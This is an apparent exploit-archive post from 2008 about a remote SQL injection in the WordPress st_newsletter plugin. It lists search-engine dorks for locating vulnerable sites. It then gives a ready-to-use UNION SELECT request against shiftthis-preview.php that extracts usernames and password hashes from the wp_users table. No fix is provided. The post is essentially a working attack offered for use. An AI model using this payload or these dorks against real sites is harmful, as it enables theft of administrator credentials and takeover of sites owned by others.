Wordpress Plugin st_newsletter Remote SQL Injection Vulnerability
2008-02-03 00:00:00#########################################################################
#
# Wordpress Plugin (st_newsletter) SQL Injection
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com/
#
#########################################################################
#
# DORKS 1 : allinurl :"wp-content/plugins/st_newsletter"
#
# DORK 2 : allinurl :"shiftthis-preview.php"
#
##########################################################################
EXPLOIT :
wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users
##########################################################################
# S@BUN www.hackturkiye.com S@BUN
##########################################################################
# S@BUN GOOD LUCKY S@BUN
##########################################################################
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.